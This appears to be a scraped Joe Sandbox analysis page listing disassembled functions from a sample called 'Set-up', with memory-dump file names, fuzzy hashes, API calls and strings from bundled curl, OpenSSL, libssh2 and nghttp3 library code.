Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: 96062f8046138ec7a3068c49d74d2a973e2f743d58b9adc02d412936ec592cf0
Instruction ID: 31d50809075f1c28e02d230da5e9ce1addc9f0f3e92cc01f1616e2ce27be91ca
Opcode Fuzzy Hash: 96062f8046138ec7a3068c49d74d2a973e2f743d58b9adc02d412936ec592cf0
Instruction Fuzzy Hash: 5A4181F5F9031066E63036657C0BF6639DC4B52F49F092029FE44B52D3FAA5B924C1A2

Function 00CE6810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00CE6884
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00CE68AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CE68C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00CE6973
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00CE6983
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00CE6995

Strings

[, xrefs: 00CE69E1

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpystrchr$atoistrlen
String ID: [
API String ID: 444251876-784033777
Opcode ID: 595a748c75444655f2f6a8a953d35ecb265f5adeba34239377e00063d7ec3666
Instruction ID: a9d55be950717b2470a61ea67c702342d1d98bb67dfc006d8f57af6c5d2e093e
Opcode Fuzzy Hash: 595a748c75444655f2f6a8a953d35ecb265f5adeba34239377e00063d7ec3666
Instruction Fuzzy Hash: 0CB189719283C15BDB358A23C89477FBBD8EB753C4F28052EE8E5C6182E725DE44A352

Function 00C863F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00C86467

Strings

mite, xrefs: 00C86688
unlimited, xrefs: 00C864A1
%s%s "%s", xrefs: 00C864AA
%d%02d%02d %02d:%02d:%02d, xrefs: 00C866D5
%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00C86540
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00C86462
hsts.c, xrefs: 00C8656B, 00C865CF

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: 1b1c05f888413975cb5a3e1ece0f9c78390c0a5e1f4dccba49ff0b3f0a8a9c80
Instruction ID: 21b4f9d017c6de5c46e0715c904786b88122ecd0984c39ff29068171a50a3d6d
Opcode Fuzzy Hash: 1b1c05f888413975cb5a3e1ece0f9c78390c0a5e1f4dccba49ff0b3f0a8a9c80
Instruction Fuzzy Hash: 9A81F6B2A08301ABE715EA24DC41F2BB7E5AF94718F18462CF95987392F731DE10C796

Function 00D26210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,00CFDB9C,?,00D23BB8,00000000,?,?), ref: 00D26433

Strings

nghttp3_ringbuf_len(chunks), xrefs: 00D264B0
chunk->end == tbuf->buf.end, xrefs: 00D2649B
nghttp3_stream.c, xrefs: 00D26429, 00D26487, 00D26496, 00D264AB, 00D264C0
stream_pop_outq_entry, xrefs: 00D2647D
stream->outq_idx + 1 >= npopped, xrefs: 00D2642E
chunk->begin == tbuf->buf.begin, xrefs: 00D264C5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: 2f85a758396706dbe40970771ab892f4c474c9831e0e7418ec1a6f7ad4172e48
Instruction ID: 4d560825cf39d3dedfdac93279eb977ac72e8de3b2bc6e6a7c2b1f8bae7aaf68
Opcode Fuzzy Hash: 2f85a758396706dbe40970771ab892f4c474c9831e0e7418ec1a6f7ad4172e48
Instruction Fuzzy Hash: E671AF70608354AFCB25DF28E881BAE77E5FFA4708F04852CF88997251E730E950CB62

Function 00C9E760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 00CA5EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CA5ED4

Part of subcall function 00CC4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00CC4F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00C9EA9B

Part of subcall function 00CA06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00CA5663,?), ref: 00CA06F9

Strings

Switch from POST to GET, xrefs: 00C9ED2B
Maximum (%ld) redirects followed, xrefs: 00C9EC11
The redirect target URL could not be parsed: %s, xrefs: 00C9E9E1
HEAD, xrefs: 00C9ED9A, 00C9EDA2
Issue another request to this URL: '%s', xrefs: 00C9ECA4
transfer.c, xrefs: 00C9E7F2, 00C9E97C, 00C9EA7D, 00C9EAA5, 00C9EAE1, 00C9EB46, 00C9EB92, 00C9EBA8, 00C9EBCA, 00C9EC43
Switch to %s, xrefs: 00C9EDA3
GET, xrefs: 00C9ED95
Clear auth, redirects to port from %u to %u, xrefs: 00C9EB1B
Clear auth, redirects scheme from %s to %s, xrefs: 00C9EB84

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: feba3fa5340086ae5ce0a199c0c55bef6a6fb3321e83e310a43463b2b281f052
Instruction ID: f69d8eca0faf518781e24d92e6fd39672465e56c4c49909e1b640a13f3904ded
Opcode Fuzzy Hash: feba3fa5340086ae5ce0a199c0c55bef6a6fb3321e83e310a43463b2b281f052
Instruction Fuzzy Hash: 01F10475904300ABEF24EE14DC8ABA63B94AF60708F088479FD599E2D3F771DA1497A1

Function 00E7A300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00E7A61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 00E7A632

Part of subcall function 00E7A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00E7A654,?,PRIVATE KEY), ref: 00E7A0BD
Part of subcall function 00E7A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00E7A0C8
Part of subcall function 00E7A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 00E7A0DF

Part of subcall function 00DF38A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DF397E

Strings

ENCRYPTED PRIVATE KEY, xrefs: 00E7A62C
PRIVATE KEY, xrefs: 00E7A616, 00E7A649
pem_read_bio_key_legacy, xrefs: 00E7A7F8, 00E7A827
PUBLIC KEY, xrefs: 00E7A5D4, 00E7A5F1
pem_read_bio_key_decoder, xrefs: 00E7A54E
ANY PRIVATE KEY, xrefs: 00E7A6B4
PEM, xrefs: 00E7A3FF
crypto/pem/pem_pkey.c, xrefs: 00E7A555, 00E7A802, 00E7A831, 00E7A85C, 00E7A872
PARAMETERS, xrefs: 00E7A5CF

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-3686562516
Opcode ID: dc30259200f10560a7688925de381f47150b15fd9f7448ecea3c92507ccccc8a
Instruction ID: b9006c666c5a198f895f91a170066afa6f362725901aee5ce0eccb1e3dea5602
Opcode Fuzzy Hash: dc30259200f10560a7688925de381f47150b15fd9f7448ecea3c92507ccccc8a
Instruction Fuzzy Hash: 24D1BAB2A443057BE7207A60AC07B6F76D99FD0748F089839FD4CB6183F671E91486A3

Function 00D6C290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 00D6C60E

Strings

Failed opening remote file, xrefs: 00D6C531
Timeout waiting for status message, xrefs: 00D6C4FB
Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 00D6C410
Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 00D6C444
Unable to send FXP_OPEN*, xrefs: 00D6C45B
feWould block waiting for status message, xrefs: 00D6C4A6
Response too small, xrefs: 00D6C4E3
Too small FXP_STATUS, xrefs: 00D6C517
Too small FXP_HANDLE, xrefs: 00D6C582, 00D6C675
Unable to allocate new SFTP handle structure, xrefs: 00D6C646

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: 88422f65e7999ea59ba430d541ea65d4f31c8bd2236d430c84612e05b7e251d2
Instruction ID: 53bbdca1057c0f1e7ead09c37439b4d0347493401c6a872f932cf3d2a0926063
Opcode Fuzzy Hash: 88422f65e7999ea59ba430d541ea65d4f31c8bd2236d430c84612e05b7e251d2
Instruction Fuzzy Hash: 49B1E4B09147419BDB10CF28DC45B7BB7A4FF85318F085A2CF49696292E771E918CBB2

Function 00CCE270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,00CCCC57), ref: 00CCF028

Strings

[%s] -> [%s], xrefs: 00CCE2E0, 00CCE38E, 00CCF116, 00CCF203
NLST, xrefs: 00CCF05E, 00CCF07A
LIST, xrefs: 00CCF059, 00CCF10A
%s%s%s, xrefs: 00CCF07B
SIZE %s, xrefs: 00CCE406
STOR_PREQUOTE, xrefs: 00CCF1F7
ftp.c, xrefs: 00CCF08A, 00CCF0BD, 00CCF13C
TYPE %c, xrefs: 00CCE323

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: 324449a5b3c68166d3b3248647054f54044c4c1b2fe215340b3f342b7c0f3c61
Instruction ID: fc2b4f61e7c14adec1345222960422faab6e1f581ad7aee879f96129a54af2a0
Opcode Fuzzy Hash: 324449a5b3c68166d3b3248647054f54044c4c1b2fe215340b3f342b7c0f3c61
Instruction Fuzzy Hash: 69A158717003449BE7269665EC45F77779AAB92308F0C427DE8588B183D376EE52C7D0

Function 00D2EAD0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX,nghttp3_qpack.c,00000447), ref: 00D2ED06
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ringbuf_len(&stream->refs),nghttp3_qpack.c,0000090A), ref: 00D2ED1B
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ringbuf_len(&stream->refs),nghttp3_qpack.c,000006F4), ref: 00D2ED30
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ref->max_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX,nghttp3_qpack.c,000006F9), ref: 00D2ED45
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX,nghttp3_qpack.c,0000091B), ref: 00D2ED5A

Strings

nghttp3_ringbuf_len(&stream->refs), xrefs: 00D2ED16, 00D2ED2B
ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX, xrefs: 00D2ED01, 00D2ED55
nghttp3_qpack.c, xrefs: 00D2ECFC, 00D2ED11, 00D2ED26, 00D2ED3B, 00D2ED50
ref->max_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX, xrefs: 00D2ED40

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$nghttp3_ringbuf_len(&stream->refs)$ref->max_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX$ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX
API String ID: 1222420520-773409149
Opcode ID: 91754a59caf62e82115efab73098f90bd9b8fc3ce4de88daf5fb84b67f6ae783
Instruction ID: 2e5d305cd49bca47b5823be84f7880536e7c74a5909631dad3db3531224b044f
Opcode Fuzzy Hash: 91754a59caf62e82115efab73098f90bd9b8fc3ce4de88daf5fb84b67f6ae783
Instruction Fuzzy Hash: 3591E575904310AFCB11DF18EC41A9BB7E5FFA5318F08492CF85957252E730A955CBB2

Function 00D2A8E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00D2A9E8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,00D271B7,00000001,?,?), ref: 00D2AA04
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,00D271B7,00000001,?,?), ref: 00D2AA19
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,00D271B7,00000001,?,?), ref: 00D2AA2E

Strings

i < blk->n, xrefs: 00D2A9FF
ksl->head, xrefs: 00D2AA29
key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key), xrefs: 00D2AA14
nghttp3_ksl.c, xrefs: 00D2A9FA, 00D2AA0F, 00D2AA24

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

